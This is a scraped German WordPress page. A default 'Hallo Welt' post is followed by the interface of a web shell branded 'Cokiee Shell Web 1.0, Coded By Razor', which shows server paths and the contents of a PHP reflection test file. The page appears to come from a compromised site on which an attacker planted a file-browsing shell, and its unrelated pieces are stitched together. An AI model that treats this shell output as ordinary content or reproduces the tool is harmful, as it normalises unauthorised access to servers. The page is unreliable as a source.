Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/reflection/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/reflection/tests/bug63614.phpt |
--TEST-- Bug #63614 (Fatal error on Reflection) --FILE-- <?php function dummy() { static $a = array(); } class Test { const A = 0; public function func() { static $a = array( self::A => 'a' ); } } $reflect = new ReflectionFunction("dummy"); print_r($reflect->getStaticVariables()); $reflect = new ReflectionMethod('Test', 'func'); print_r($reflect->getStaticVariables()); ?> --EXPECT-- Array ( [a] => Array ( ) ) Array ( [a] => Array ( [0] => a ) )
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare